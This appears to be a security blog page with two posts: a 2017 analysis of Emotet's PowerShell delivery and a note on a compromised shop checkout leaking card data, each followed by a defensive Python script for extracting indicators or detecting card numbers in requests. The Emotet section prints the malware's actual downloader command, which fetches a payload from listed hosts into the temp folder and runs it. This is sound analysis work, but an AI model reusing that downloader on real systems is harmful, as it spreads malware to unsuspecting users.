Posts

Showing posts from 2017

September 2017, Decoding the latest Emotet PowerShell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before: an email phish with a link, and the link downloads a malicious document. The document, usually a malicious Word document, uses VBA to build and execute a PowerShell command, which then downloads the next stage of the infection. This used to be very simple to see; for example, older observed variants produced the following PowerShell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...
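The older downloader quoted above has a fixed shape: a comma-joined URL string handed to `.Split(',')`, a random file name from `$random.next()`, and a drop path under `$env:temp`. The following script is an added example written for this page, not code from the post or from Emotet analysts; it pulls the stage-2 URLs, hosts and drop-path pattern out of that command so they can be fed to a blocklist or proxy-log hunt. The sample command is the one printed in the post (URLs kept defanged as printed, and cut where the excerpt is cut); the regexes are assumptions that target this variant's structure and would need adjusting for the newer, more obfuscated builds the post goes on to discuss.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: the older Emotet PowerShell downloader quoted in the post,
# URLs kept defanged exactly as printed there. The command is truncated on the
# page, so the sample stops where the excerpt does.
SAMPLE_CMD = (
    "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;"
    "$webclient = new-object System.Net.WebClient;$random = new-object random;"
    "$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,"
    "hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,"
    "hxxp://rghuston[.]com/gxrdcca/'.Split(',');"
    "$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';"
    "foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);"
    "Start-Process $path;break;}"
)

# Assumed structure of this variant: a single-quoted, comma-joined URL list.
URL_LIST_RE = re.compile(r"\$urls\s*=\s*'([^']*)'\s*\.Split\(','\)", re.IGNORECASE)
# $random.next(min, max) picks the dropped file name; max is exclusive in .NET.
RANDOM_RE = re.compile(r"\$random\.next\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.IGNORECASE)
# The extension is the last quoted literal concatenated onto $path.
EXT_RE = re.compile(r"\$path\s*=.*?\+\s*'(\.[A-Za-z0-9]+)'", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn hxxp://host[.]tld back into a real URL for matching against proxy logs."""
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.IGNORECASE)
    return url.replace("[.]", ".")


def defang(url: str) -> str:
    """Inverse of refang(): the safe form for writing IOCs into a report."""
    p = urlsplit(url)
    scheme = p.scheme.lower().replace("http", "hxxp", 1)
    return urlunsplit((scheme, p.netloc.replace(".", "[.]"), p.path, p.query, p.fragment))


def extract_download_urls(cmd: str) -> list[str]:
    """Stage-2 URLs in the order the downloader tries them, duplicates removed."""
    m = URL_LIST_RE.search(cmd)
    if not m:
        return []
    seen, urls = set(), []
    for raw in m.group(1).split(","):
        u = refang(raw)
        if u and u not in seen:
            seen.add(u)
            urls.append(u)
    return urls


def extract_hosts(cmd: str) -> list[str]:
    """Unique hostnames, in first-seen order, for DNS/proxy hunting."""
    return list(dict.fromkeys(urlsplit(u).hostname for u in extract_download_urls(cmd)))


def extract_drop_path(cmd: str) -> dict:
    """Where the payload lands: %TEMP%\\<N><ext> with N in the inclusive range."""
    r, e = RANDOM_RE.search(cmd), EXT_RE.search(cmd)
    return {
        "directory": "%TEMP%" if "$env:temp" in cmd.lower() else None,
        "name_range": (int(r.group(1)), int(r.group(2)) - 1) if r else None,
        "extension": e.group(1) if e else None,
    }


def iocs(cmd: str) -> dict:
    """Everything a blocklist or hunt query needs; URLs defanged for the write-up."""
    return {
        "urls": [defang(u) for u in extract_download_urls(cmd)],
        "hosts": extract_hosts(cmd),
        "drop": extract_drop_path(cmd),
    }


if __name__ == "__main__":
    for key, value in iocs(SAMPLE_CMD).items():
        print(key, value)
```

The duplicate `rghuston[.]com` entry in the list collapses to one URL, and the mixed `http`/`hxxp` schemes in the printed sample normalise to one form, so the hunt list is clean. The drop-path range is inclusive because `.NET`'s `Random.Next(min, max)` never returns `max`.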

Beware Compromised Shopping Carts

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure item on the web and come across a website which just seems a bit off. Yesterday I received a Snort alert which I often see on a compromised host: "ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad". What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with the user's credit card and billing information in the request header. See screenshot. I've excluded the rest of the transcript so as not to mention the site, which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for building supplies. When looking at the website's checkout page, I stumbled upon the following code: ...
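The tell in the post is card data travelling in a GET request line and headers rather than in a POST body. The script below is an added example for this page, not code from the post or from any IDS ruleset; it scans a reconstructed HTTP request for PAN-looking digit runs, keeps only those that pass the Luhn check (so order numbers and timestamps do not fire), masks them, and reports where in the request they sat. The request transcript is constructed (industry test card numbers, a fictional host) to match the shape the post describes; the header names and the 13-to-19-digit PAN pattern are assumptions.

```python
import re

# Constructed sample in the shape the post describes: a GET whose request line and
# headers carry the shopper's card and billing data. Test card numbers only; the
# 16-digit X-Order-Id is a deliberate look-alike that fails the Luhn check.
SAMPLE_REQUEST = (
    "GET /checkout/submit.php?cc=4111111111111111&exp=12%2F20&cvv=123 HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "X-Order-Id: 1234567890123456\r\n"
    "X-Billing: John Doe; 5555 5555 5555 4444; 1 Main St\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /catalog/lumber?page=2 HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "\r\n"
)

# Assumed PAN shape: 13-19 digits, optional single space/dash separators,
# not glued to neighbouring digits.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: every real card number passes, most random digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(text: str) -> list[str]:
    """Luhn-valid card-like numbers in text, separators stripped."""
    found = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            found.append(digits)
    return found


def mask(pan: str) -> str:
    """Keep BIN and last four so the finding is usable without storing the PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_request(raw: str) -> list[dict]:
    """Report each Luhn-valid PAN in the request line or a header, with its location."""
    head = raw.split("\r\n\r\n", 1)[0]          # ignore any body; the point is the head
    lines = head.split("\r\n")
    request_line = lines[0]
    method = request_line.split(" ", 1)[0]
    findings = []
    for pan in find_pans(request_line):
        findings.append({"where": "request-line", "method": method, "pan": mask(pan)})
    for line in lines[1:]:
        name, _, value = line.partition(":")
        for pan in find_pans(value):
            findings.append({"where": f"header:{name.strip()}", "method": method, "pan": mask(pan)})
    return findings


if __name__ == "__main__":
    for finding in scan_request(SAMPLE_REQUEST):
        print(finding)
```

A PAN in the request line is the worse case of the two, because it is written to every web server, proxy and CDN access log on the path, which is exactly the kind of exposure a compromised checkout creates. Run the same scan over the request headers of outbound traffic from the shopper's side and the alert is independent of which skimmer script the cart is carrying.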